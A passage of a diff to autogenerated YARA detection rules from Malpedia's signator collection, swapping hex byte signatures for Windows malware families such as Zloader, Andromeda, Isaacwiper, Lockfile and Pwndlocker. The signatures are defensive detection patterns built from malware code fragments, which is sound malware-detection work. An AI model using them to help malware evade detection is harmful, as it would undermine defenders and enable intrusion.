$sequence_4 = { a3???????? 0f8422030000 a1???????? 68???????? 50 ffd6 } - $sequence_5 = { 8b7d08 8d054c914000 83780800 753b b0ff } - $sequence_6 = { 8db60c844000 bf???????? a5 a5 59 } - $sequence_7 = { ffd6 85c0 a3???????? 0f84a2050000 } - $sequence_8 = { ffd6 85c0 a3???????? 0f84ef010000 68???????? ffd7 } - $sequence_9 = { 85c0 a3???????? 0f8424020000 8b15???????? 68???????? 52 } + $sequence_0 = { eb20 8b55ec 8975e8 89f1 57 53 e8???????? } + $sequence_1 = { 8d55b0 e8???????? eb25 c745b000000000 8d4dd0 8d55b0 e8???????? } + $sequence_2 = { c1e204 88443110 89f8 f7d0 c1e004 f30f7e0403 f30f7e4c0308 } + $sequence_3 = { c1c71a 31fa 8b7b04 89c3 339d70ffffff 0fcf 21cb } + $sequence_4 = { e9???????? 8d543210 8b7508 f20f104a30 f20f114e40 f20f104a28 f20f114e38 } + $sequence_5 = { f20f1101 8b55f0 8d4da8 ff7518 ff7514 ff7510 ff750c } + $sequence_6 = { f20f1145c8 0f82de010000 80ff0a 894804 0f85c9000000 8b7d0c 8b55ec } + $sequence_7 = { f20f114c2438 f20f108c2488000000 f20f11542430 f20f105028 f20f11442440 f20f115c2418 f20f1018 } + $sequence_8 = { e8???????? e9???????? ffb424fc000000 e8???????? e9???????? e8???????? 89c3 } + $sequence_9 = { ffd1 83c404 8b8c24a0190000 83790400 741f 8b84249c190000 83790809 } condition: - 7 of them and filesize <90112 + 7 of them and filesize <3340288 } -rule MALPEDIA_Win_Kikothac_Auto : FILE +rule MALPEDIA_Win_Karius_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "48840edd-1eda-587e-96d1-699222be4802" + id = "ed0a7186-5551-553c-ac59-b131d3af72d8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kikothac_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.karius_auto.yar#L1-L249" license_url = "N/A" - logic_hash = "ddecb618114edd432a6ac40a5ecfd59b3208358e4b28a6940c432c46b4921216" + logic_hash = "b146425f067402ca1aeb5e04aa4caed2d124eb5c4ba40f66c5f112d8e9115a94" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -146686,32 +149540,49 @@ rule MALPEDIA_Win_Kikothac_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85c0 7516 8b86942f4100 b301 85c0 740a } - $sequence_1 = { 50 ff15???????? a3???????? 3bc3 7507 32c0 5b } - $sequence_2 = { 56 33f6 57 8975fc ffd3 85c0 } - $sequence_3 = { c60424cd 8d642438 e9???????? c64424046e 895500 9c 6689742408 } - $sequence_4 = { c1c80a e9???????? 66894500 9c } - $sequence_5 = { 8b441604 51 50 ff15???????? 85c0 7516 } - $sequence_6 = { 51 68102ba40e ff3424 9c 8f442438 } - $sequence_7 = { 6820040000 57 57 57 } - $sequence_8 = { 60 f6c356 c6442404ab 20d0 } - $sequence_9 = { e9???????? 8b7c242c 66c70424dc83 98 9f 8b442430 660fbeeb } + $sequence_0 = { 4c8b8424a0000000 bf01000000 8bd7 498bce ffd3 4183bf8c00000000 } + $sequence_1 = { 4d03d6 448bcd 85db 0f8477000000 8bb424b0000000 } + $sequence_2 = { 0f84b3000000 458b9f88000000 4d03de 418b5b18 85db } + $sequence_3 = { ffd3 4183bf8c00000000 0f84b3000000 458b9f88000000 } + $sequence_4 = { 488b05???????? 4885c0 7512 ff15???????? 488905???????? } + $sequence_5 = { 8bb424b0000000 418b10 8bcd 4903d6 0fb602 } + $sequence_6 = { c3 85c0 7505 e8???????? b801000000 } + $sequence_7 = { 85db 0f849d000000 41837b1400 0f8492000000 } + $sequence_8 = { 0f8492000000 458b4320 458b5324 33ed 4d03c6 4d03d6 } + $sequence_9 = { 8d7b01 448bfb 448be3 4885c9 } + $sequence_10 = { 56 be???????? 33d2 8a040a 3a06 7522 } + $sequence_11 = { 83e830 89450c db450c 8a07 d9ca d8c9 } + $sequence_12 = { b801000000 8702 83f801 74f4 } + $sequence_13 = { 752c 8a4701 3c30 7c25 3c39 } + $sequence_14 = { 488d4b10 488d542450 41b804000000 c6430f68 } + $sequence_15 = { 4d8bcf 33d2 41b800001000 488bce } + $sequence_16 = { 803e5d 7508 5f 5b 8d4601 5e } + $sequence_17 = { 7505 8d7b02 eb09 6685c0 } + $sequence_18 = { 8d7308 56 ffd7 50 56 e8???????? } + $sequence_19 = { ff15???????? 4c8be8 498bce ff15???????? 4d85ed } + $sequence_20 = { 8b4dfc 83c404 8945f4 83c706 050024ffff } + $sequence_21 = { 4d8bc7 488bd0 488bce ff15???????? } + $sequence_22 = { e9???????? 8b45f8 5f 5b 5e } + $sequence_23 = { 8b4508 85c0 7417 8b4008 85c0 7412 8b4d0c } + $sequence_24 = { 7405 f60001 7502 33c0 } + $sequence_25 = { 448bc0 33d2 488bce ff15???????? 4c8bf0 4885c0 } + $sequence_26 = { 48895c2420 4d8bcc 4d8bc7 488bd0 } condition: - 7 of them and filesize <581632 + 7 of them and filesize <434176 } -rule MALPEDIA_Win_Isaacwiper_Auto : FILE +rule MALPEDIA_Win_Lockfile_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1329030c-897c-5c01-8c07-662be913ab23" + id = "544691b3-5a18-5d07-a020-f938e5dff9ba" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.isaacwiper_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lockfile_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "ed4c1277cdfb0687c916d7f4c8800e6899b857de5108f3daf478ca99ea587637" + logic_hash = "dc414bc646e8b114a7dca14d5155afbe9c4203cc45e95fbd463e125e3eb42e08" score = 75 quality = 75 tags = "FILE" @@ -146725,32 +149596,32 @@ rule MALPEDIA_Win_Isaacwiper_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 771b 52 51 e8???????? 83c408 5f c706???????? } - $sequence_1 = { b804000000 33d2 395138 0f45c2 0b410c 0bc3 50 } - $sequence_2 = { 8d0471 3bc8 7319 8d46ff } - $sequence_3 = { 5b 8be5 5d c3 6a34 e8???????? 8bf0 } - $sequence_4 = { 7576 eb56 8b0485d89e0210 6800080000 6a00 50 8945fc } - $sequence_5 = { 744a 83c118 57 8b7d14 894d08 0f1f4000 } - $sequence_6 = { 81ecc8090000 56 57 8bf1 c745f800000000 ff15???????? 898538f6ffff } - $sequence_7 = { 6685f6 743e 6a00 8bd6 8bcf e8???????? 8ad0 } - $sequence_8 = { 85db 0f8454010000 8bc6 83e001 03c8 d1ee } - $sequence_9 = { 8bf8 83e03f c1ff06 6bd038 8b34bde8670310 8a441628 } + $sequence_0 = { 418bdc 33d9 8bcb 4123cf 4133cc 03d1 8955bb } + $sequence_1 = { 488b4b58 49894a48 488b5360 49895250 48837b6010 7731 41c6424101 } + $sequence_2 = { 488bf1 33d2 e8???????? 33d2 48895618 48895620 } + $sequence_3 = { e9???????? 4c8d4c245c 4c8d4570 488d15b31e0600 488d8d70020000 e8???????? 488d8d70020000 } + $sequence_4 = { 85c0 7411 836530fe 488b4d38 4883c178 e8???????? } + $sequence_5 = { 57 4883ec20 8bfa 488bd9 488b4908 4885c9 740b } + $sequence_6 = { 0f845c010000 83792801 0f8552010000 e8???????? 8bd8 483bde 480f42de } + $sequence_7 = { 0f84a5000000 488b0d???????? 488b15???????? 4c3bc1 750d 488bc1 48d1e8 } + $sequence_8 = { 41c1c802 4123cb 418bd1 0bc8 c1c205 03cd 418bc0 } + $sequence_9 = { 88458c 8b4580 0409 3465 88458d 8b4580 040a } condition: - 7 of them and filesize <467968 + 7 of them and filesize <1163264 } -rule MALPEDIA_Win_Nemim_Auto : FILE +rule MALPEDIA_Win_Dustman_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7264494b-d73b-5298-a829-f60e4932364f" + id = "36b1ddf2-cf7c-571e-9cd1-f2576b628e0f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nemim_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dustman_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "0e5cb332d550079bcd770b6c5ca18dad9c60646bca1f9092ed4ed3564e5ea600" + logic_hash = "7655ffd1fc19c69013d45a561f004630940d9eb32b369648a9a2d4d61dad6d9e" score = 75 quality = 75 tags = "FILE" @@ -146764,34 +149635,34 @@ rule MALPEDIA_Win_Nemim_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { a1???????? c1e002 89b48050744300 8b0d???????? 893d???????? 890d???????? } - $sequence_1 = { eb3b a1???????? 68???????? 50 e8???????? 83c408 } - $sequence_2 = { 5e 5b c9 c20400 8bc1 c700???????? c3 } - $sequence_3 = { 5e 5d b801000000 5b 81c4bc000000 c3 } - $sequence_4 = { 8d44240c 55 50 56 c744241828010000 e8???????? 85c0 } - $sequence_5 = { 51 e8???????? 8dbc24600a0000 83c9ff 33c0 } - $sequence_6 = { 8b16 c1ea08 885001 8b0e c1e910 } - $sequence_7 = { 52 e8???????? 8b4c2440 8944244c b801000000 } - $sequence_8 = { 83fe10 7cde c605????????00 b90b000000 be???????? 8dbc2410010000 } - $sequence_9 = { 8844244c e8???????? 68???????? e8???????? 68???????? 8bf0 } + $sequence_0 = { 488d150d620100 4b8d1c36 4c897710 4c8bc3 488bce } + $sequence_1 = { 448d4303 895c2428 488d0ddb720000 4533c9 4489442420 } + $sequence_2 = { 4903cb 48894d48 488bca 492bca 4c8d9dca010000 4903cb 48894d50 } + $sequence_3 = { 884803 420fb60c20 884804 420fb60c28 884805 0fb60c10 } + $sequence_4 = { f20f102d???????? f20f590d???????? f20f59ee f20f5ce9 f2410f1004c1 488d15767f0000 f20f1014c2 } + $sequence_5 = { 7405 e8???????? b001 4883c428 c3 488d158ba50000 } + $sequence_6 = { 492bca 4c8d9dcd010000 4903cb 48894d68 488bca 492bca 4c8d9dce010000 } + $sequence_7 = { 488d053f1f0000 498b0b 4889442450 488b85e0040000 4889442460 486385f0040000 } + $sequence_8 = { e8???????? 4885c0 7509 488d0597420100 eb04 4883c024 } + $sequence_9 = { 48c1e028 480bd8 0fb6852e020000 48c1e030 480bd8 0fb6852f020000 48c1e038 } condition: - 7 of them and filesize <499712 + 7 of them and filesize <368640 } -rule MALPEDIA_Win_Zloader_Auto : FILE +rule MALPEDIA_Win_Sdbbot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "97b40e53-0323-5f57-82eb-14236d63ac31" + id = "6668321a-45c2-56a4-8219-52041c66e0ea" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zloader_auto.yar#L1-L384" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sdbbot_auto.yar#L1-L188" license_url = "N/A" - logic_hash = "d615cfd8aec428fea853159c669b5f75c64755d955e56d958f0ce28518a00d78" + logic_hash = "0618d5957379edb357e3ce8de647ff0724885b87e782036bd514add2c7f2cbe6" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -146803,62 +149674,40 @@ rule MALPEDIA_Win_Zloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 6a01 56 ffd0 89f7 89f8 } - $sequence_1 = { 57 56 83ec0c 8b5d0c 8b7d10 8d75e8 89f1 } - $sequence_2 = { 55 89e5 56 8b7508 ff36 e8???????? 83c404 } - $sequence_3 = { 0fb7450c 8d9df0feffff 53 50 ff7508 e8???????? } - $sequence_4 = { 57 56 8b7d08 57 e8???????? } - $sequence_5 = { 0fb7c0 57 50 53 e8???????? 83c40c 89f1 } - $sequence_6 = { 53 56 83ec0c 8d75ec 56 6aff } - $sequence_7 = { 55 89e5 56 8b750c ff7508 e8???????? 83c404 } - $sequence_8 = { 56 50 a1???????? 89c1 } - $sequence_9 = { 5e 8bc3 5b c3 8b44240c } - $sequence_10 = { 68???????? ff742408 e8???????? 59 59 84c0 741e } - $sequence_11 = { e8???????? 59 84c0 7432 68???????? ff742408 e8???????? } - $sequence_12 = { 57 56 50 8b4510 31db } - $sequence_13 = { e8???????? 03c0 6689442438 8b442438 } - $sequence_14 = { 6aff 50 e8???????? 8d857cffffff 50 } - $sequence_15 = { 50 89542444 e8???????? 03c0 } - $sequence_16 = { 6689442438 8b442438 83c002 668944243a } - $sequence_17 = { 83c414 c3 56 ff742410 } - $sequence_18 = { 99 52 50 8d44243c 99 52 50 } - $sequence_19 = { c6043000 5e c3 56 57 8b7c2414 83ffff } - $sequence_20 = { 50 56 56 56 ff7514 } - $sequence_21 = { 83c408 5e 5d c3 55 89e5 57 } - $sequence_22 = { 6a00 e8???????? 83c414 c3 8b542404 } - $sequence_23 = { c7462401000000 c7462800004001 e8???????? 89460c } - $sequence_24 = { 81c4a8020000 5e 5f 5b } - $sequence_25 = { 55 89e5 53 57 56 81eca8020000 } - $sequence_26 = { e9???????? 31c0 83c40c 5e 5f } - $sequence_27 = { 0bc3 a3???????? e8???????? 8bc8 eb06 8b0d???????? 85c9 } - $sequence_28 = { 89b42430010000 8b842430010000 8b842430010000 890424 c74424041c010000 e8???????? } - $sequence_29 = { 89cf 8d0476 8945ec 890424 } - $sequence_30 = { 50 6a72 e8???????? 59 } - $sequence_31 = { 56 57 ff750c 33db 68???????? 6880000000 50 } - $sequence_32 = { 8bc2 ebf7 8d442410 50 ff742410 ff742410 ff742410 } - $sequence_33 = { 56 68???????? ff742410 e8???????? 6823af2930 56 ff742410 } - $sequence_34 = { 50 e8???????? 68???????? 56 e8???????? 8bf0 59 } - $sequence_35 = { 5f 5e 5b c3 8bc2 ebf8 53 } - $sequence_36 = { 33f6 e8???????? ff7508 8d85f0fdffff 68???????? } - $sequence_37 = { 68???????? 56 e8???????? 5e c3 56 } - $sequence_38 = { 8d85f0fdffff 68???????? 6804010000 50 e8???????? 83c414 8d45fc } - $sequence_39 = { 8bc2 ebf8 53 8b5c240c 55 33ed } + $sequence_0 = { e8???????? 8bf8 ba4d5a0000 6690 } + $sequence_1 = { 803e61 7203 83c1e0 81c2ffff0000 03cf } + $sequence_2 = { 8bcf 85d2 7418 8bfe 2b7df8 } + $sequence_3 = { 8d4901 8841ff 8d5201 83ee01 } + $sequence_4 = { 2bd1 03c1 8955ec 8945e4 85d2 0f8560ffffff } + $sequence_5 = { 8b7028 33c9 0fb75024 0f1f8000000000 0fb63e } + $sequence_6 = { 8b01 03c6 8945e8 eb2e 3daafc0d7c } + $sequence_7 = { 6683f803 750b 81e1ff0f0000 013c31 eb27 6683f801 7511 } + $sequence_8 = { c3 803d????????00 750c c605????????01 } + $sequence_9 = { 33f6 8a27 83c702 84e4 7437 } + $sequence_10 = { 7419 0f1f8000000000 0fb602 48ffc2 8801 488d4901 4983e801 } + $sequence_11 = { 0f1f840000000000 418b49f8 49ffca 418b11 4903ce 458b41fc } + $sequence_12 = { 7204 4883c0e0 4803c1 48ffc2 664503c1 75e5 3d5bbc4a6a } + $sequence_13 = { 48833f00 488bd8 75a4 4883c514 837d0000 0f856dffffff } + $sequence_14 = { 4903ce 41ffd5 488bf0 4885c0 7474 } + $sequence_15 = { 85c0 0f84bb000000 418b9fb0000000 8bf8 4903de } + $sequence_16 = { 4d2bc5 0fb601 41880408 488d4901 4883ea01 75ef 450fb74f14 } + $sequence_17 = { 4d03fd 41b800300000 448d4940 418b5750 ffd6 418b5750 488bc8 } condition: - 7 of them and filesize <1105920 + 7 of them and filesize <1015808 } -rule MALPEDIA_Win_Collection_Rat_Auto : FILE +rule MALPEDIA_Win_Isspace_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "57812c72-d174-5305-a791-07d9524d5d58" + id = "6de2cc9e-3c1b-5d82-85e8-a409082de585" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.collection_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.collection_rat_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.isspace_auto.yar#L1-L100" license_url = "N/A" - logic_hash = "47382a0b15866fbc9363efde1f8fbfda4134e668af0afa7d4fd14596481603d4" + logic_hash = "e463ab51553d0208df8251abb329c162f866232bb82c29826d5e55ecd0eb426f" score = 75 quality = 75 tags = "FILE" @@ -146872,32 +149721,30 @@ rule MALPEDIA_Win_Collection_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488b5567 488d4ef0 4803cf 458bc6 e8???????? 85c0 } - $sequence_1 = { 488d05870c0100 488bd9 488901 f6c201 740a ba18000000 e8???????? } - $sequence_2 = { 488b4138 8938 e9???????? 488b05???????? 488b4808 488b4130 } - $sequence_3 = { 4883c102 33d2 e8???????? 488b0d???????? 488b5108 48894218 488b05???????? } - $sequence_4 = { 0f8467010000 488bc4 48895808 48897010 48897818 4c897020 55 } - $sequence_5 = { 458bf0 0fb7f2 4885c9 0f84d1000000 488b9c24a8000000 4885db } - $sequence_6 = { 83a424b000000000 ba14000000 33c9 448d42fa e8???????? 488d0d74740200 ffd0 } - $sequence_7 = { e8???????? 482be0 bd00100000 488d8c24e0000000 448bc5 33d2 } - $sequence_8 = { 488b4a28 e8???????? 84c0 740b 488bd6 498bcd } - $sequence_9 = { 488b4830 4c89542450 bf03000000 897c2448 488d442468 4889442440 488d8424d0000000 } + $sequence_0 = { 57 50 8d45f0 64a300000000 8965e8 c745fc00000000 c785505cffff00a20000 } + $sequence_1 = { 46 8bc6 c1e004 03c6 } + $sequence_2 = { ff15???????? 50 eb05 68???????? 68???????? ff15???????? } + $sequence_3 = { 6800010000 8d8600010000 6a00 50 e8???????? 83c418 8bc6 } + $sequence_4 = { e8???????? 83c418 83c60a 56 } + $sequence_5 = { 85c0 7507 68???????? eb04 83c007 } + $sequence_6 = { c78548ffffff9c000000 e8???????? 8ad8 c745fc00000000 } + $sequence_7 = { eb0a 6a00 6a23 eb04 6a00 } condition: - 7 of them and filesize <397312 + 7 of them and filesize <434176 } -rule MALPEDIA_Win_Sykipot_Auto : FILE +rule MALPEDIA_Win_Tiop_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6685d9d7-6a5e-5dd1-be8d-f9a06a5df784" + id = "a48d1e15-9fc1-5bab-9fa2-c3c7b063ec8e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sykipot_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tiop_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "fc1ea45bf7dc961b3986859ea4bfe6fc9a7dfe7e53218e4f87e591fa79b5c1da" + logic_hash = "62d0ea75fcf8689409f77f7c307d37bf3637d8a3da71cff9b0be16f18afd1eb3" score = 75 quality = 75 tags = "FILE" @@ -146911,32 +149758,32 @@ rule MALPEDIA_Win_Sykipot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8c2488000000 51 ffd5 68???????? 68???????? ffd3 83c408 } - $sequence_1 = { 56 c744246004000000 ffd7 8b4c244c 6a04 } - $sequence_2 = { 50 51 8bcd e8???????? 8b13 8d442414 52 } - $sequence_3 = { 50 8db42498000000 83ec44 8bfc } - $sequence_4 = { 5d b80e000000 5b 81c45c180000 c3 56 8b35???????? } - $sequence_5 = { 8bcc 8911 8b94244c060000 894104 895108 8bcd } - $sequence_6 = { 55 56 ff15???????? 85c0 57 7513 ff15???????? } - $sequence_7 = { bf???????? a3???????? f3ab b941000000 bf???????? f3ab b941000000 } - $sequence_8 = { 83ec44 b911000000 8db424e8000000 8bfc f3a5 8bcd e8???????? } - $sequence_9 = { c24800 8b442404 56 57 } + $sequence_0 = { 81ec08010000 55 56 57 b940000000 33c0 8d7c2411 } + $sequence_1 = { ff15???????? 50 ff15???????? 8b3d???????? 8bf0 ffd7 50 } + $sequence_2 = { 57 33ed b94f000000 33c0 8d7c240c 896c2408 892d???????? } + $sequence_3 = { ff15???????? 50 8b44241c 53 50 ff5510 8b4c241c } + $sequence_4 = { 8b7c2410 56 8b35???????? 894704 ffd6 55 ffd6 } + $sequence_5 = { f3a4 8b442414 8b7500 8b4c2410 2bf0 03d0 897500 } + $sequence_6 = { eb2e 50 ffd3 8d7c0002 8bc7 83c003 24fc } + $sequence_7 = { 6a01 6a00 ffd7 8b1d???????? 8bf0 56 89742410 } + $sequence_8 = { 83c9ff 33c0 83c404 f2ae f7d1 6a10 49 } + $sequence_9 = { 8b542418 8b4c2420 8b3d???????? 8944240c 8b44242c 89542408 8b542424 } condition: - 7 of them and filesize <286720 + 7 of them and filesize <712704 } -rule MALPEDIA_Win_Cameleon_Auto : FILE +rule MALPEDIA_Win_Socks5_Systemz_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "65617330-75c8-57cf-8907-1895d87814f0" + id = "11fdca9d-b672-58c8-b928-df2c27b8d2c6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cameleon_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.socks5_systemz_auto.yar#L1-L97" license_url = "N/A" - logic_hash = "1c72ed0d3ea99fe45b9cdedee31a0c82e32752220a6d117c9414b55a84125b1d" + logic_hash = "c567898c7f496303ddbf924e08954da7846c60ee6266bcbd0213f34733b6e6b6" score = 75 quality = 75 tags = "FILE" @@ -146950,34 +149797,32 @@ rule MALPEDIA_Win_Cameleon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 56 57 8bf9 897df0 c745ec00000000 8b07 } - $sequence_1 = { 8a80f8c70410 8807 47 46 8bcb c6458301 e8???????? } - $sequence_2 = { 83ec18 8bd4 8965ec c7421000000000 c7421400000000 } - $sequence_3 = { 8d7dd0 837de408 0f437dd0 83ec18 8bd4 c7421000000000 c7421400000000 } - $sequence_4 = { 48 a3???????? ff15???????? 8b0d???????? 89048d98ce0510 5d c3 } - $sequence_5 = { 247f 88441628 eb12 0c80 88441628 8b0cbd50d60510 c644112900 } - $sequence_6 = { b83b000000 663bc8 0f94c0 84c0 7431 } - $sequence_7 = { 8d55dc c645fc02 8d8d24ffffff e8???????? 8bc8 8b01 } - $sequence_8 = { 8bd9 56 57 837b3800 0f848c010000 807b3d00 0f8482010000 } - $sequence_9 = { 5d c20400 85ff 75d4 897e10 837e1408 720f } + $sequence_0 = { 50 64892500000000 83ec14 894df0 8b45f0 83c018 } + $sequence_1 = { 8b45c8 c6041000 b901000000 6bd100 8b8500feffff } + $sequence_2 = { 8b45d4 8945e0 8b4ddc 51 } + $sequence_3 = { 8b45d8 8945f0 837df000 7413 } + $sequence_4 = { 8b45cc c6041000 b901000000 6bd100 8b45c8 c6041000 } + $sequence_5 = { 8b45cc 50 e8???????? 59 c3 8d4dd8 } + $sequence_6 = { 8b45d0 e9???????? e9???????? 837dcc00 } + $sequence_7 = { 8b45d8 50 8b4df0 83c124 } condition: - 7 of them and filesize <824320 + 7 of them and filesize <491520 } -rule MALPEDIA_Win_Andromeda_Auto : FILE +rule MALPEDIA_Win_Pwndlocker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "06e8a020-0fd4-5226-bdbc-44028f668872" + id = "68fbdce5-97ba-5b4c-a728-8efe50c54b3b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.andromeda_auto.yar#L1-L309" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pwndlocker_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "b22436b7aba3ed23bef95d1f14e5fb10f193d85aea0247573fcd01991d4926fb" + logic_hash = "035ce763bc16632a928a77294057e290950a177cc8c2678dfab31b46c9b29c9e" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -146989,56 +149834,34 @@ rule MALPEDIA_Win_Andromeda_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 74cf ebcf 33c0 33db 33c9 33d2 8b7d10 } - $sequence_1 = { 8b7508 33db 368a942900ffffff 02c2 020433 368ab42800ffffff } - $sequence_2 = { 3688b42800ffffff 3688942b00ffffff 02d6 81e2ff000000 368a942a00ffffff 301439 } - $sequence_3 = { 368a942a00ffffff 301439 41 3b4d14 75c3 } - $sequence_4 = { 368ab42800ffffff 3688b42900ffffff 3688942800ffffff fec1 7408 } - $sequence_5 = { 368a942800ffffff 02da 368ab42b00ffffff 3688b42800ffffff 3688942b00ffffff } - $sequence_6 = { 8d7dfc b8fcfdfeff fd ab 2d04040404 e2f8 fc } - $sequence_7 = { 8bec 81c400ffffff 60 b940000000 8d7dfc b8fcfdfeff } - $sequence_8 = { 60 e8???????? 5d 81ed???????? 33c9 } - $sequence_9 = { 3c41 0f9dc2 85ca 7404 0420 8806 } - $sequence_10 = { 50 e8???????? 83c40c 6800000100 e8???????? } - $sequence_11 = { 0fb64601 84c0 7905 0d00ffffff } - $sequence_12 = { 8a06 33c9 3c5a 0f9ec1 33d2 } - $sequence_13 = { 8d45d0 50 6a01 ff7508 } - $sequence_14 = { ff7564 50 6aff 53 56 56 ffd7 } - $sequence_15 = { 8b4dfc ff75e4 03c8 51 ff15???????? } - $sequence_16 = { 68???????? ff75f4 e8???????? ff75f4 e8???????? 68???????? } - $sequence_17 = { 6a00 6a06 6a01 6a02 e8???????? 8945f0 83f8ff } - $sequence_18 = { e8???????? 6a06 ff75f8 e8???????? 8d45f4 } - $sequence_19 = { ff75f0 e8???????? c7459c44000000 8945d4 } - $sequence_20 = { e8???????? 83f800 7526 ff75f8 e8???????? 40 50 } - $sequence_21 = { 83f8ff 7466 6a05 ff75f0 } - $sequence_22 = { 6a05 ff75f0 e8???????? 83f8ff 7457 33c0 8d7d9c } - $sequence_23 = { 8945fc 83f800 0f8476010000 6804010000 6a00 ff35???????? e8???????? } - $sequence_24 = { 314508 ff560c 8b7d04 0bd8 81fbb599839e 7503 } - $sequence_25 = { 31450c 315dfc ff5634 31450c 81c75853b2b3 } - $sequence_26 = { 81ef21cfd856 2bd8 81ff1ac8cfd4 0f84ac000000 } - $sequence_27 = { 0f8418010000 8365f000 6850020000 6a08 ff750c ff5604 } - $sequence_28 = { ff560c 0faff8 8b456c 8b00 89456c ff5638 0fafd8 } - $sequence_29 = { 3d00010000 7322 888405ecfeffff ff560c } - $sequence_30 = { 81fb15af295e 0f85ae000000 81ef52eceb06 ff5634 8bd8 81cb15af295e 8b45fc } - $sequence_31 = { ff5634 8b4d0c 81c951dbc951 0fafc1 89450c } + $sequence_0 = { c1cf0d 01c7 ebf4 3b7df0 75e0 5a } + $sequence_1 = { 01d8 83c078 8b00 8d3403 8b4e18 } + $sequence_2 = { c1cf0d 01c7 ebf4 3b7df0 } + $sequence_3 = { ebf4 3b7df0 75e0 5a 8b7224 01de 31c0 } + $sequence_4 = { 31ff 31c0 fc ac 84c0 7407 } + $sequence_5 = { c1cf0d 01c7 ebf4 3b7df0 75e0 5a 8b7224 } + $sequence_6 